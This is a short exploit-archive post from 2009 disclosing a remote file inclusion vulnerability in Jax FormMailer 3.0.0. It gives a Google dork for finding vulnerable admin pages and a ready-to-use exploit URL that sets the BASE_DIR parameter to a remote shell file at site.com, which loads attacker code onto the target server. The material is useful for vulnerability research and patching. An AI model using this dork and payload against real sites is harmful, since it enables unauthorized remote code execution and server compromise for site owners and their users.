[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability
# Published : 2009-06-30
# Author : ahmadbady
# Previous Title : BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability
# Next Title : phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability


--:remote file include:--
---------------------------------                  
script:Jax FormMailer 3.0.0
Release:01.06.2008
-
Author: ahmadbady
    
-----------------------------------------------------------------------
download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html
   
-----------------------------------------------------------------------
dork:intitle:"Jax Formmailer - Administration"
-------------------------------------------
-------------------------------------------
xpl:

/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt?

*******************************************

# www.Syue.com [2009-06-30]